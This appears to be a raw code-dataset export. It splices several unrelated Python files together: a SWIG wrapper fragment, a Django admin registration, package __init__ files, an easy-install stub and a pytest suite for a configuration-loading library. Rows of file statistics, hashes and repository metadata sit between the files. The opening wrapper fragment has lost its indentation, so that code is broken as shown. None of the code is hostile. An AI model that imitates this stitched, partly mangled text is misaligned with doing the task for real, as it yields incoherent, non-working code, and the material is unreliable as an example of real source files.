def __init__(self, *args):
this = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.new_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence(*args)
try:
self.this.append(this)
except:
self.this = this
def assign(self, n, x):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_assign(self, n, x)
def begin(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_begin(self, *args)
def end(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_end(self, *args)
def rbegin(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_rbegin(self, *args)
def rend(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_rend(self, *args)
def at(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_at(self, *args)
def front(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_front(self, *args)
def back(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_back(self, *args)
def push_back(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_push_back(self, *args)
def pop_back(self):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_pop_back(self)
def detach_back(self, pop=True):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_detach_back(self, pop)
def insert(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_insert(self, *args)
def erase(self, *args):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_erase(self, *args)
def detach(self, position, r, erase=True):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_detach(self, position, r, erase)
def swap(self, x):
return _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_swap(self, x)
__swig_destroy__ = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.delete_SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence
__del__ = lambda self: None
SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_swigregister = _SimGeomSurfaceModel_FaceBasedSurfaceModel_Default.SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_swigregister
SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence_swigregister(SimGeomSurfaceModel_FaceBasedSurfaceModel_Default_sequence)
# This file is compatible with both classic and new-style classes.
| 45.638554 | 196 | 0.775783 | 1,082 | 11,364 | 7.562847 | 0.134011 | 0.415496 | 0.407797 | 0.193572 | 0.746303 | 0.696688 | 0.649028 | 0.596969 | 0.518636 | 0.445436 | 0 | 0.001773 | 0.156459 | 11,364 | 248 | 197 | 45.822581 | 0.851867 | 0.025871 | 0 | 0.407216 | 1 | 0 | 0.030199 | 0.009042 | 0 | 0 | 0 | 0 | 0 | 1 | 0.149485 | false | 0.010309 | 0.056701 | 0.108247 | 0.530928 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
be0ef28ce1fc0291a42cd99f32b01f61d466ea81 | 144 | py | Python | stores/apps/lots/admin.py | diassor/CollectorCity-Market-Place | 892ad220b8cf1c0fc7433f625213fe61729522b2 | [
"Apache-2.0"
] | 135 | 2015-03-19T13:28:18.000Z | 2022-03-27T06:41:42.000Z | stores/apps/lots/admin.py | dfcoding/CollectorCity-Market-Place | e59acec3d600c049323397b17cae14fdcaaaec07 | [
"Apache-2.0"
] | null | null | null | stores/apps/lots/admin.py | dfcoding/CollectorCity-Market-Place | e59acec3d600c049323397b17cae14fdcaaaec07 | [
"Apache-2.0"
] | 83 | 2015-01-30T01:00:15.000Z | 2022-03-08T17:25:10.000Z | from models import *
from django.contrib import admin
admin.site.register(Lot)
admin.site.register(ImageLot)
admin.site.register(BidHistory)
| 16 | 32 | 0.805556 | 20 | 144 | 5.8 | 0.55 | 0.232759 | 0.439655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097222 | 144 | 8 | 33 | 18 | 0.892308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
078e0b2672dacb4b76bb648966c385829c38dd74 | 43 | py | Python | Python/deepfetal/deepfetal/unit/__init__.py | lcorgra/RGDSVR | 46b0b707a797902a5330d6bd5c73bb6fcec01aba | [
"MIT"
] | null | null | null | Python/deepfetal/deepfetal/unit/__init__.py | lcorgra/RGDSVR | 46b0b707a797902a5330d6bd5c73bb6fcec01aba | [
"MIT"
] | null | null | null | Python/deepfetal/deepfetal/unit/__init__.py | lcorgra/RGDSVR | 46b0b707a797902a5330d6bd5c73bb6fcec01aba | [
"MIT"
] | null | null | null | from .decoder import *
from .atac import *
| 14.333333 | 22 | 0.72093 | 6 | 43 | 5.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 43 | 2 | 23 | 21.5 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0792496935ab4210fc4b75f4185aae8d94bf9eeb | 65 | py | Python | qpip/__init__.py | vongostev/QPIP | f19fac9a22cbca0d80a20bc55d57d5c97f296fc4 | [
"MIT"
] | 1 | 2021-02-28T16:41:47.000Z | 2021-02-28T16:41:47.000Z | qpip/__init__.py | vongostev/QPIP | f19fac9a22cbca0d80a20bc55d57d5c97f296fc4 | [
"MIT"
] | 1 | 2021-04-20T22:12:46.000Z | 2021-04-20T22:12:46.000Z | qpip/__init__.py | vongostev/QPIP | f19fac9a22cbca0d80a20bc55d57d5c97f296fc4 | [
"MIT"
] | null | null | null | from .epscon import *
from .denoise import *
from .moms import *
| 16.25 | 22 | 0.723077 | 9 | 65 | 5.222222 | 0.555556 | 0.425532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184615 | 65 | 3 | 23 | 21.666667 | 0.886792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
07a8d666606606e1bfa28670b50f4002ecb12cea | 181 | py | Python | Scripts/rst2odt.py | saranya515/python-api | 9870b064c1238845b3e6714c8116e3c949868c62 | [
"bzip2-1.0.6"
] | null | null | null | Scripts/rst2odt.py | saranya515/python-api | 9870b064c1238845b3e6714c8116e3c949868c62 | [
"bzip2-1.0.6"
] | null | null | null | Scripts/rst2odt.py | saranya515/python-api | 9870b064c1238845b3e6714c8116e3c949868c62 | [
"bzip2-1.0.6"
] | null | null | null | #!C:\Python27\python.exe
# EASY-INSTALL-SCRIPT: 'docutils==0.12','rst2odt.py'
__requires__ = 'docutils==0.12'
__import__('pkg_resources').run_script('docutils==0.12', 'rst2odt.py')
| 36.2 | 70 | 0.723757 | 26 | 181 | 4.653846 | 0.653846 | 0.223141 | 0.272727 | 0.280992 | 0.429752 | 0.429752 | 0 | 0 | 0 | 0 | 0 | 0.075581 | 0.049724 | 181 | 4 | 71 | 45.25 | 0.627907 | 0.40884 | 0 | 0 | 0 | 0 | 0.485714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
07b7d3ee8f425a7242a0b1637d8e188acab8a205 | 25,190 | py | Python | tests/test_configuration_set.py | Frank5000/python-configuration | daecc89ce704dd043c00748de7aa62185ae739eb | [
"MIT"
] | 51 | 2019-03-01T07:24:35.000Z | 2022-03-28T15:14:11.000Z | tests/test_configuration_set.py | Frank5000/python-configuration | daecc89ce704dd043c00748de7aa62185ae739eb | [
"MIT"
] | 57 | 2019-07-05T20:08:32.000Z | 2022-03-03T14:58:42.000Z | tests/test_configuration_set.py | Frank5000/python-configuration | daecc89ce704dd043c00748de7aa62185ae739eb | [
"MIT"
] | 22 | 2019-07-05T15:55:18.000Z | 2021-12-02T10:23:12.000Z | from config import (
config_from_dict,
config_from_env,
config_from_python,
create_path_from_config,
Configuration,
ConfigurationSet,
config,
)
import os
import json
try:
import yaml
except ImportError:
yaml = None # type: ignore
try:
import toml
except ImportError:
toml = None # type: ignore
import pytest
DICT1 = {
"a1.B1.c1": 1,
"a1.b1.C2": 2,
"A1.b1.c3": 3,
"a1.b2.c1": "a",
"a1.b2.c2": True,
"a1.b2.c3": 1.1,
}
DICT2_1 = {"a2.b1.c1": "f", "a2.b1.c2": False, "a2.B1.c3": None}
DICT2_2 = {"a2.b2.c1": 10, "a2.b2.c2": "YWJjZGVmZ2g=", "a2.b2.C3": "abcdefgh"}
DICT3_1 = {
"a2.b2.c1": 10,
"a2.b2.c2": "YWJjZGVmZ2g=",
"a2.b2.C3": "abcdefgh",
"z1": 100,
}
DICT3_2 = {"a2": 10, "z1.w2": 123, "z1.w3": "abc"}
DICT3_3 = {"a2.g2": 10, "a2.w2": 123, "a2.w3": "abc"}
DICT3 = {
"a3.b1.c1": "af",
"a3.b1.c2": True,
"a3.b1.c3": None,
"a3.b2.c1": 104,
"a3.b2.c2": "YWJjZGVmZ2g=",
"a3.b2.c3": "asdfdsbcdefgh",
}
JSON = json.dumps(DICT3)
DICT4 = {
"a3.b1.c1": "afsdf",
"a3.b1.c2": False,
"a3.b1.c3": None,
"a3.b2.c1": 107,
"a3.b2.c2": "YWsdfsJjZGVmZ2g=",
"a3.b2.c3": "asdfdssdfbcdefgh",
}
JSON2 = json.dumps(DICT4)
if yaml:
YAML = """
z1:
w1: 1
w2: null
w3: abc
z2:
w1: 1.1
w2:
- a
- b
- c
w3:
p1: 1
p2: 5.4
"""
DICT_YAML = {
"z1.w1": 1,
"z1.w2": None,
"z1.w3": "abc",
"z2.w1": 1.1,
"z2.w2": ["a", "b", "c"],
"z2.w3": {"p1": 1, "p2": 5.4},
}
if toml:
TOML = """
[owner]
name = "ABC"
[database]
server = "192.168.1.1"
ports = [ 8001, 8001, 8002,]
connection_max = 5000
enabled = true
[clients]
data = [ [ "gamma", "delta",], [ 1, 2,],]
hosts = [ "alpha", "omega",]
[servers.alpha]
ip = "10.0.0.1"
dc = "eqdc10"
[servers.beta]
ip = "10.0.0.2"
dc = "eqdc10"
"""
DICT_TOML = {
"owner": {"name": "ABC"},
"database": {
"server": "192.168.1.1",
"ports": [8001, 8001, 8002],
"connection_max": 5000,
"enabled": True,
},
"clients": {"data": [["gamma", "delta"], [1, 2]], "hosts": ["alpha", "omega"]},
"servers": {
"alpha": {"ip": "10.0.0.1", "dc": "eqdc10"},
"beta": {"ip": "10.0.0.2", "dc": "eqdc10"},
},
}
INI = """
[section1]
key1 = True
[section2]
key1 = abc
key2 = def
key3 = 1.1
[section3]
key1 = 1
key2 = 0
"""
DICT_INI = {
"section1.key1": "True",
"section2.key1": "abc",
"section2.key2": "def",
"section2.key3": "1.1",
"section3.key1": "1",
"section3.key2": "0",
}
DOTENV = """
dotenv1 = abc
dotenv2 = 1.2
dotenv3 = xyz
"""
DICT_DOTENV = {
"dotenv1": "abc",
"dotenv2": "1.2",
"dotenv3": "xyz",
}
PATH_DICT = {
"sdf.dsfsfd": 1,
"sdjf.wquwe": "sdfsd",
"sdjf.wquwe43": None,
"sdjf.wquwse43": True,
}
PREFIX = "CONFIG"
os.environ.update(
(PREFIX + "__" + k.replace(".", "__").upper(), str(v)) for k, v in DICT1.items()
)
def test_load_env(): # type: ignore
cfg = ConfigurationSet(
config_from_dict(DICT2_1, lowercase_keys=True),
config_from_dict(DICT2_2, lowercase_keys=True),
config_from_env(prefix=PREFIX, lowercase_keys=True),
)
# from env
assert cfg["a1.b1.c1"] == "1"
assert cfg["a1.b1"].get_int("c1") == 1
assert cfg["a1.b1"].as_dict() == {"c1": "1", "c2": "2", "c3": "3"}
assert cfg["a1.b2"].as_dict() == {"c1": "a", "c2": "True", "c3": "1.1"}
# from dict
assert cfg["a2.b1.c1"] == "f"
assert cfg["a2.b2"].as_dict() == {"c1": 10, "c2": "YWJjZGVmZ2g=", "c3": "abcdefgh"}
def test_fails(): # type: ignore
cfg = ConfigurationSet(
config_from_dict(DICT2_1, lowercase_keys=True),
config_from_dict(DICT2_2, lowercase_keys=True),
config_from_env(prefix=PREFIX, lowercase_keys=True),
)
with pytest.raises(KeyError, match="a1.b2.c3.d4"):
assert cfg["a1.b2.c3.d4"] is Exception
with pytest.raises(AttributeError, match="c4"):
assert cfg.a1.b2.c4 is Exception
with pytest.raises(ValueError, match="Expected a valid True or False expression."):
assert cfg["a1.b2"].get_bool("c3") is Exception
def test_get(): # type: ignore
cfg = ConfigurationSet(
config_from_dict(DICT2_1, lowercase_keys=True),
config_from_dict(DICT2_2, lowercase_keys=True),
config_from_env(prefix=PREFIX, lowercase_keys=True),
)
assert cfg.get("a2.b2") == config_from_dict(
{"c1": 10, "c2": "YWJjZGVmZ2g=", "c3": "abcdefgh"}
)
assert cfg.get("a2.b5", "1") == "1"
def test_get_dict(): # type: ignore
cfg = ConfigurationSet(
config_from_dict(DICT2_1, lowercase_keys=True),
config_from_dict(DICT2_2, lowercase_keys=True),
config_from_env(prefix=PREFIX, lowercase_keys=True),
)
a2 = {
"b2.c1": 10,
"b1.c1": "f",
"b1.c2": False,
"b1.c3": None,
"b2.c1": 10,
"b2.c2": "YWJjZGVmZ2g=",
"b2.c3": "abcdefgh",
}
a2nested = {
"b1": {"c1": "f", "c2": False, "c3": None},
"b2": {"c1": 10, "c2": "YWJjZGVmZ2g=", "c3": "abcdefgh"},
}
assert cfg.get_dict("a2") == a2
assert cfg.a2.as_dict() == a2
assert dict(cfg.a2) == a2nested
with cfg.dotted_iter():
assert cfg.get_dict("a2") == a2
assert cfg.a2.as_dict() == a2
# note that this still returns he nested dict since the dotted iteration
# impacts only the parent cfg, not cfg.a
assert dict(cfg.a2) == a2nested
# to use dotted iteration for children, we need to explicitly set it
with cfg.a2.dotted_iter() as cfg_a2:
assert dict(cfg_a2) == a2
with pytest.raises(KeyError):
assert cfg.get_dict("a3") is Exception
assert dict(cfg.a2) == dict(cfg.a2.items())
def test_get_dict_different_types(): # type: ignore
cfg = ConfigurationSet(
config_from_dict(DICT3_1, lowercase_keys=True),
config_from_dict(DICT3_2, lowercase_keys=True), # a2 is ignored here
config_from_dict(DICT3_3, lowercase_keys=True),
)
a2 = {
"b2.c1": 10,
"b2.c2": "YWJjZGVmZ2g=",
"b2.c3": "abcdefgh",
"g2": 10,
"w2": 123,
"w3": "abc",
}
a2nested = {
"b2": {"c1": 10, "c2": "YWJjZGVmZ2g=", "c3": "abcdefgh"},
"g2": 10,
"w2": 123,
"w3": "abc",
}
assert cfg.get_dict("a2") == a2
assert cfg.a2.as_dict() == a2
assert dict(cfg.a2) == a2nested
with cfg.dotted_iter():
assert cfg.get_dict("a2") == a2
assert cfg.a2.as_dict() == a2
# note that this still returns he nested dict since the dotted iteration
# impacts only the parent cfg, not cfg.a
assert dict(cfg.a2) == a2nested
# to use dotted iteration for children, we need to explicitly set it
with cfg.a2.dotted_iter() as cfg_a2:
assert dict(cfg_a2) == a2
with pytest.raises(TypeError): # the first configuration overrides the type
assert cfg.get_dict("z1") is Exception
assert cfg.z1 == 100
def test_repr_and_str(): # type: ignore
import sys
path = os.path.join(os.path.dirname(__file__), "python_config.py")
cfg = ConfigurationSet(
config_from_dict(DICT2_1, lowercase_keys=True),
config_from_dict(DICT2_2, lowercase_keys=True),
config_from_env(prefix=PREFIX, lowercase_keys=True),
config_from_python(path, prefix="CONFIG", lowercase_keys=True),
)
joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
joined_dicts.update(DICT2_1)
joined_dicts.update(DICT2_2)
joined_dicts["sys.version"] = sys.hexversion
assert hex(id(cfg)) in repr(cfg)
assert (
str(cfg)
== "{'a1.b1.c1': '1', 'a1.b1.c2': '2', 'a1.b1.c3': '3', 'a1.b2.c1': 'a', 'a1.b2.c2': 'True', "
"'a1.b2.c3': '1.1', 'a2.b1.c1': 'f', 'a2.b1.c2': False, 'a2.b1.c3': None, 'a2.b2.c1': 10, "
"'a2.b2.c2': 'YWJjZGVmZ2g=', 'a2.b2.c3': 'abcdefgh', 'sys.version': "
+ str(sys.hexversion)
+ "}"
)
def test_alternate_set_loader(): # type: ignore
import sys
path = os.path.join(os.path.dirname(__file__), "python_config.py")
import tempfile
with tempfile.TemporaryDirectory() as folder:
create_path_from_config(folder, config_from_dict(PATH_DICT), remove_level=0)
entries = [
DICT2_1, # assumes dict
("dict", DICT2_2),
("env", PREFIX),
("python", path, "CONFIG"),
("json", JSON),
("ini", INI),
("dotenv", DOTENV),
("path", folder, 0),
]
if yaml:
entries.append(("yaml", YAML))
if toml:
entries.append(("toml", TOML))
cfg = config(*entries, lowercase_keys=True)
joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
joined_dicts.update(DICT2_1)
joined_dicts.update(DICT2_2)
joined_dicts.update(DICT3)
joined_dicts.update(DICT_INI)
joined_dicts.update(DICT_DOTENV)
if yaml:
joined_dicts.update(DICT_YAML)
if toml:
joined_dicts.update(DICT_TOML)
joined_dicts.update((k, str(v)) for k, v in PATH_DICT.items())
joined_dicts["sys.version"] = sys.hexversion
assert (
config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
)
assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_alternate_set_loader_prefix(): # type: ignore
import sys
path = os.path.join(os.path.dirname(__file__), "python_config.py")
import tempfile
with tempfile.TemporaryDirectory() as folder:
create_path_from_config(folder, config_from_dict(PATH_DICT), remove_level=0)
cfg = config(
DICT2_1, # assumes dict
("dict", DICT2_2),
("env",),
("python", path),
("json", JSON),
("ini", INI),
("dotenv", DOTENV),
("path", folder, 0),
prefix="CONFIG",
lowercase_keys=True,
)
joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
joined_dicts.update(DICT2_1)
joined_dicts.update(DICT2_2)
joined_dicts.update(DICT3)
joined_dicts.update(DICT_INI)
joined_dicts.update(DICT_DOTENV)
joined_dicts.update((k, str(v)) for k, v in PATH_DICT.items())
joined_dicts["sys.version"] = sys.hexversion
assert (
config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
)
assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_alternate_set_loader_strings(): # type: ignore
import sys
path = str(os.path.join(os.path.dirname(__file__), "python_config.py"))
import tempfile
with tempfile.TemporaryDirectory() as folder, tempfile.NamedTemporaryFile(
suffix=".json"
) as f1, tempfile.NamedTemporaryFile(
suffix=".ini"
) as f2, tempfile.NamedTemporaryFile(
suffix=".yaml"
) as f3, tempfile.NamedTemporaryFile(
suffix=".toml"
) as f4, tempfile.NamedTemporaryFile(
suffix=".env"
) as f5:
# path
subfolder = folder + "/sub"
os.makedirs(subfolder)
create_path_from_config(subfolder, config_from_dict(PATH_DICT), remove_level=1)
# json
f1.file.write(JSON.encode())
f1.file.flush()
# ini
f2.file.write(INI.encode())
f2.file.flush()
# ini
f5.file.write(DOTENV.encode())
f5.file.flush()
entries = [
DICT2_1, # dict
DICT2_2,
"env",
path, # python
f1.name, # json
f2.name, # ini
f5.name, # .env
folder, # path
]
if yaml:
f3.file.write(YAML.encode())
f3.file.flush()
entries.append(f3.name) # yaml
if toml:
f4.file.write(TOML.encode())
f4.file.flush()
entries.append(f4.name) # toml
cfg = config(*entries, prefix="CONFIG", lowercase_keys=True)
joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
joined_dicts.update(DICT2_1)
joined_dicts.update(DICT2_2)
joined_dicts.update(DICT3)
joined_dicts.update(DICT_INI)
joined_dicts.update(DICT_DOTENV)
if yaml:
joined_dicts.update(DICT_YAML)
if toml:
joined_dicts.update(DICT_TOML)
joined_dicts.update((k, str(v)) for k, v in PATH_DICT.items())
joined_dicts["sys.version"] = sys.hexversion
assert (
config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
)
assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_alternate_set_loader_strings_python_module(): # type: ignore
import sys
module = "tests.python_config"
import tempfile
with tempfile.TemporaryDirectory() as folder, tempfile.NamedTemporaryFile(
suffix=".json"
) as f1, tempfile.NamedTemporaryFile(
suffix=".ini"
) as f2, tempfile.NamedTemporaryFile(
suffix=".yaml"
) as f3, tempfile.NamedTemporaryFile(
suffix=".toml"
) as f4:
# path
subfolder = folder + "/sub"
os.makedirs(subfolder)
create_path_from_config(subfolder, config_from_dict(PATH_DICT), remove_level=1)
# json
f1.file.write(JSON.encode())
f1.file.flush()
# ini
f2.file.write(INI.encode())
f2.file.flush()
entries = [
DICT2_1, # dict
DICT2_2,
"env",
module, # python
f1.name, # json
f2.name, # ini
folder, # path
]
if yaml:
f3.file.write(YAML.encode())
f3.file.flush()
entries.append(f3.name)
if toml:
f4.file.write(TOML.encode())
f4.file.flush()
entries.append(f4.name) # toml
cfg = config(*entries, prefix="CONFIG", lowercase_keys=True)
joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
joined_dicts.update(DICT2_1)
joined_dicts.update(DICT2_2)
joined_dicts.update(DICT3)
joined_dicts.update(DICT_INI)
if yaml:
joined_dicts.update(DICT_YAML)
if toml:
joined_dicts.update(DICT_TOML)
joined_dicts.update((k, str(v)) for k, v in PATH_DICT.items())
joined_dicts["sys.version"] = sys.hexversion
assert (
config_from_dict(joined_dicts, lowercase_keys=True).as_dict() == cfg.as_dict()
)
assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
def test_alternate_set_loader_fails(): # type: ignore
with pytest.raises(
ValueError,
match="configs should be a non-empty iterable of Configuration objects",
):
assert config() is Exception
with pytest.raises(ValueError):
assert config(("no type", "")) is Exception
with pytest.raises(ValueError):
assert config("no type") is Exception
with pytest.raises(ValueError):
assert config([]) is Exception
with pytest.raises(ValueError):
assert config(("python",)) is Exception
def test_allow_missing_paths(): # type: ignore
import os
import tempfile
with tempfile.TemporaryDirectory() as folder:
with pytest.raises(FileNotFoundError):
config(("path", os.path.join(folder, "sub")))
with pytest.raises(FileNotFoundError):
config(os.path.join(folder, "file.json"))
with pytest.raises(FileNotFoundError):
config(os.path.join(folder, "file.ini"))
with pytest.raises(FileNotFoundError):
config(os.path.join(folder, "file.env"))
with pytest.raises(FileNotFoundError):
config(os.path.join(folder, "module.py"))
with pytest.raises(ModuleNotFoundError):
config(("python", folder))
if yaml:
with pytest.raises(FileNotFoundError):
config(os.path.join(folder, "file.yaml"))
if toml:
with pytest.raises(FileNotFoundError):
config(os.path.join(folder, "file.toml"))
entries = [
"env",
os.path.join(folder, "file.json"),
os.path.join(folder, "file.ini"),
os.path.join(folder, "file.env"),
("path", os.path.join(folder, "sub")),
os.path.join(folder, "module.py"),
("python", folder),
]
if yaml:
entries.append(os.path.join(folder, "file.yaml"))
if toml:
entries.append(os.path.join(folder, "file.toml"))
config(*entries, ignore_missing_paths=True)
def test_dict_methods_items(): # type: ignore
cfg = ConfigurationSet(
config_from_dict(DICT2_1, lowercase_keys=True),
config_from_dict(DICT2_2, lowercase_keys=True),
config_from_env(prefix=PREFIX, lowercase_keys=True),
)
assert dict(cfg.items()) == {
"a1": {
"b1.c1": "1",
"b1.c2": "2",
"b1.c3": "3",
"b2.c1": "a",
"b2.c2": "True",
"b2.c3": "1.1",
},
"a2": {
"b1.c1": "f",
"b1.c2": False,
"b1.c3": None,
"b2.c1": 10,
"b2.c2": "YWJjZGVmZ2g=",
"b2.c3": "abcdefgh",
},
}
with cfg.dotted_iter():
assert dict(cfg.items()) == dict(
[
("a2.b2.c2", "YWJjZGVmZ2g="),
("a1.b2.c2", "True"),
("a1.b2.c1", "a"),
("a1.b1.c2", "2"),
("a2.b2.c3", "abcdefgh"),
("a2.b1.c1", "f"),
("a1.b1.c3", "3"),
("a2.b1.c2", False),
("a2.b1.c3", None),
("a1.b1.c1", "1"),
("a2.b2.c1", 10),
("a1.b2.c3", "1.1"),
]
)
def test_dict_methods_keys_values(): # type: ignore
cfg = ConfigurationSet(
config_from_dict(DICT2_1, lowercase_keys=True),
config_from_dict(DICT2_2, lowercase_keys=True),
config_from_env(prefix=PREFIX, lowercase_keys=True),
)
assert sorted(cfg.keys()) == [
"a1",
"a2",
]
assert dict(zip(cfg.keys(), cfg.values())) == {
"a1": {
"b1.c1": "1",
"b1.c2": "2",
"b1.c3": "3",
"b2.c1": "a",
"b2.c2": "True",
"b2.c3": "1.1",
},
"a2": {
"b1.c1": "f",
"b1.c2": False,
"b1.c3": None,
"b2.c1": 10,
"b2.c2": "YWJjZGVmZ2g=",
"b2.c3": "abcdefgh",
},
}
with cfg.dotted_iter():
assert sorted(cfg.keys()) == [
"a1.b1.c1",
"a1.b1.c2",
"a1.b1.c3",
"a1.b2.c1",
"a1.b2.c2",
"a1.b2.c3",
"a2.b1.c1",
"a2.b1.c2",
"a2.b1.c3",
"a2.b2.c1",
"a2.b2.c2",
"a2.b2.c3",
]
assert dict(zip(cfg.keys(), cfg.values())) == cfg.as_dict()
def test_reload(): # type: ignore
import sys
path = str(os.path.join(os.path.dirname(__file__), "python_config.py"))
import tempfile
with tempfile.TemporaryDirectory() as folder, tempfile.NamedTemporaryFile(
suffix=".json"
) as f1, tempfile.NamedTemporaryFile(
suffix=".ini"
) as f2, tempfile.NamedTemporaryFile(
suffix=".yaml"
) as f3, tempfile.NamedTemporaryFile(
suffix=".toml"
) as f4, tempfile.NamedTemporaryFile(
suffix=".env"
) as f5:
# path
subfolder = folder + "/sub"
os.makedirs(subfolder)
create_path_from_config(subfolder, config_from_dict(PATH_DICT), remove_level=1)
# json
f1.file.write(JSON.encode())
f1.file.flush()
# ini
f2.file.write(INI.encode())
f2.file.flush()
# ini
f5.file.write(DOTENV.encode())
f5.file.flush()
entries = [
DICT2_1, # dict
DICT2_2,
"env",
path, # python
f1.name, # json
f2.name, # ini
f5.name, # .env
folder, # path
]
if yaml:
f3.file.write(YAML.encode())
f3.file.flush()
entries.append(f3.name) # yaml
if toml:
f4.file.write(TOML.encode())
f4.file.flush()
entries.append(f4.name) # toml
cfg = config(*entries, prefix="CONFIG", lowercase_keys=True)
joined_dicts = dict((k, str(v)) for k, v in DICT1.items())
joined_dicts.update(DICT2_1)
joined_dicts.update(DICT2_2)
joined_dicts.update(DICT3)
joined_dicts.update(DICT_INI)
joined_dicts.update(DICT_DOTENV)
if yaml:
joined_dicts.update(DICT_YAML)
if toml:
joined_dicts.update(DICT_TOML)
joined_dicts.update((k, str(v)) for k, v in PATH_DICT.items())
joined_dicts["sys.version"] = sys.hexversion
assert (
config_from_dict(joined_dicts, lowercase_keys=True).as_dict()
== cfg.as_dict()
)
assert config_from_dict(joined_dicts, lowercase_keys=True) == cfg
# json
f1.file.seek(0)
f1.file.truncate(0)
f1.file.write(JSON2.encode())
f1.file.flush()
cfg.reload()
assert cfg["a3.b1.c1"] == "afsdf"
def test_configs(): # type: ignore
# readable configs
cfg = ConfigurationSet(
config_from_dict(DICT2_1, lowercase_keys=True),
config_from_dict(DICT2_2, lowercase_keys=True),
config_from_env(prefix=PREFIX, lowercase_keys=True),
)
assert cfg.configs[0] == config_from_dict(DICT2_1, lowercase_keys=True)
cfg.configs = cfg.configs[1:]
